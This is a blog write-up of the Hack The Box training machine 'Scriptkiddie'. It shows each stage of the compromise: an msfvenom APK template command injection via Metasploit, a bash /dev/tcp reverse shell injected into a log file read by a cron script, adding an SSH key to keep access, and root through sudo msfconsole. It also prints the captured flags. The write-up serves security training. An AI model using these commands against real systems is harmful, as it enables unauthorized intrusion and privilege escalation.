17th October 2021
Hack The Box Scriptkiddie write-up by T13nn3s

Hack The Box Write-Up – Scriptkiddie – 10.10.10.226

A hacker does for love what others would not do for money

Laura Creighton

About Scriptkiddy

In this post, I’m writing a write-up for machine Scriptkiddie from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Scriptkiddie is an ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15, and submitting the root flag your points will be raised by 30.

Foothold
After the initial port scan, we know that there are two open ports. The first port is 22/tcp as the default SSH port and the second port is 5000/tcp. There is a small website running behind the last open port. If we are visiting this website, we can find some great tools for script kiddies. After creating a reverse shell payload for android, we have a reverse shell as the user kid.

User
After having a reverse shell as the user kid, we’ve found a second user account pwn. In the home directory of this user account, we have found a file scanlosers.sh. This file is calling the file /home/kid/logs/hackers. Through code injection in the hacker’s file, we can establish a reverse shell as the user account pwn.

Root
The user account pwn has the permissions to run Metasploit Framework as root. Through the Metasploit Framework Can we read arbitrary files and therefore the root flag.

Machine Info

Hack The Box Scriptkiddie write-up by T13nn3s
Hack The Box Scriptkiddue write-up by T13nn3s
Hack The Box Scriptkiddie Machine IP and maker
Hack The Box Scriptkiddie Machine IP and maker

Reconnaisance

Port scan

As always we start this machine with a Nmap port scan.

~$ nmap -sC -sV -oA ./nmap/10.10.10.226 10.10.10.226

The results.

Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-11 11:40 EST
Nmap scan report for 10.10.10.226
Host is up (0.35s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds

The Nmap port scan reveals open ports. The first port 22/tcp is the default SSH port. The second port is 5000/tcp. Through the header, we see that Werkzeug 0.16.1 based on Python 3.8.5 is running behind this port and that the website has the title k1d'5 h4ck3r t00l5. This machine has Linux as the operating system.

Enumeration Web Server

Let’s start with the enumeration of the webserver. We visit the website by visiting the URL http://10.10.10.226:5000. We are landing on a website which offers some services. We can run a Nmap port scan, creating some payloads with msfvenom and searching for exploits through searchsploit.

Hack The Box Scriptkiddie website
http://10.10.10.226:5000

Exploitation

Reverse shell as kid

After trying to get Remote Command Execution (RCE) by typing some commands, like $(ls) in the test area’s we are receiving the message stop hacking me - well hack you back. The message is clear, but don’t scare us into going further.

 Hack The Box Scriptkiddie website pentesting
http://10.10.10.226:5000 -> stop hacking me – well hack you back

On the payloads section, we can try some payloads, but the Windows and Linux payloads are not giving us access to the machine. The last thing we can try in this section is trying to create a reverse shell with an APK file. Tried to gain a reverse shell with a APK payload created by msfvenom, but that payload was not working. After some searching, I found this article from Rapid7: https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/. Let’s create the payload.

~$ msfconsole
msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set lhost 10.10.16.144
lhost => 10.10.16.144
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit

[+] msf.apk stored at /root/.msf4/local/msf.apk
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) >

Renamed this payload to shell.apk. The next step is uploading the shell.apk to get a reverse shell on this machine.

Hack The Box Scriptkiddie android reverse shell

After setting our listerner on port 4444 and clicking on ‘Generate’ we are getting a reverse shell as the user account kid in the directory /home/kid/html.

~$ netcat -lvvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.226.
Ncat: Connection from 10.10.10.226:38374.
id; whoami
uid=1000(kid) gid=1000(kid) groups=1000(kid)
kid
python3 -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:~/html$ 

We can read the user flag.

[email protected]:~$ cat user.txt
cat user.txt
2709fc55032a7f3141a22f29d568870f

Lateral Movement

From user kid to pwn

First make sure that we have a persistant connection to this machine by adding our public key to the authorized_keys. For this purpose we can create a new ed25519 keypair with keygen. Then, we can add our public key to the file.

[email protected]:~/.ssh$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBpBkZCc27/6Vp51uObztZZnxkhwTuB76TvcqYIXH8WL [email protected]" >> ~/.ssh/authorized_keys 

We can now create an SSH session as the user account kid.

ssh [email protected] -i id_ed25519
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-65-generic x86_64)

* Documentation:  https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage

System information as of Fri Feb 12 19:46:15 UTC 2021

System load:             0.09
Usage of /:              29.2% of 17.59GB
Memory usage:            8%
Swap usage:              0%
Processes:               246
Users logged in:         0
IPv4 address for ens160: 10.10.10.226
IPv6 address for ens160: dead:beef::250:56ff:feb9:2a22 

1 update can be installed immediately.
1 of these updates is a security update.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Wed Feb  3 12:07:35 2021 from 10.10.14.4
[email protected]:~$ 

There is an second user on this machine.

[email protected]:/home$ ls
kid  pwn

The user account pwn is holding some files in his home directory.

[email protected]:/home/pwn$ ls
recon  scanlosers.sh

The contents of the scanlosers.sh is interesting. It’s calling the file hackers from the home directory of the user account kid.

!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

We can add contents to this file, but immediately the contents are being removed from this file. A cronjob or something is running, which is calling this file. This file is on the home directory of the user account pwn, and it’s running on behalf of this user account. To get a reverse shell as the user account pwn, we can inject code in this script. Let’s first write a small bash script to monitor this file as we adding our payload to this file.

!/bin/bash
 while true;
 do
      cat /home/kid/logs/hackers
 done

With this script we are monitoring the file /home/kid/logs/hackers. The next step is developing a payload for the reverse shell. After some time developing we are ending with this payload.

echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.144/5555 0>&1' #"  >> hackers

This payload is starting with a semicolon (;), which means that the running script is breaking and our payload got executed. To prevent error messages from occurring after our code injection, we have placed the comment sign (#) at the end of our payload. With this, the rest of the script is seen as a comment.

We set our listener on port 5555, and after execution, our payload of the /home/kid/logs/hackers file is being called from the user account pwn, and the reverse shell is established.

~$ netcat -lvvp 5555
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.226.
Ncat: Connection from 10.10.10.226:33290.
bash: cannot set terminal process group (869): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~$

Privilege Escalation

Enumeration

We are now in the last stage of this machine, escalate our privileges to root. As always, we start with the sudo -l command.

[email protected]:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

We having the privileges to run the Metasploit Framework with root privileges. This is our way to root this machine.

Own Scriptiddie

We can start the Metasploit Framework as root, so let’s do it.

~$ sudo msfconsole
 msfconsole

-- --=[ metasploit v6.0.9-dev.                                         ]
-- --=[ 2069 exploits - 1122 auxiliary - 352 post      ]
-- --=[ 592 payloads - 45 encoders - 10 nops            ]
-- --=[ 7 evasion                                                                 ] 

Metasploit tip: You can upgrade a shell to a Meterpreter session on many platforms using sessions -u stty: 'standard input': Inappropriate ioctl for device

 msf6 > 

We can now use cat to read the contents of the root flag. To get a full shell from Metasploit, we can invoke the command /bin/bash -c.

msf6 > cat /root/root.txt
stty: 'standard input': Inappropriate ioctl for device
[*] exec: cat /root/root.txt
f1c4d6e596a38a5becc1c4b17779d1df

Thanks for reading this write-up! Did you like this write-up? Please consider spending a respect point, my HTB profile: https://www.hackthebox.eu/home/users/profile/224856. Also, I’m writing my write-ups in my spare time. Through the Hack The Box platform, I’m learning new techniques and insights. Please grant me a nice cup of coffee for my hard work :-).

Thanks in advance!

Happy Hacker Face 🙂

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *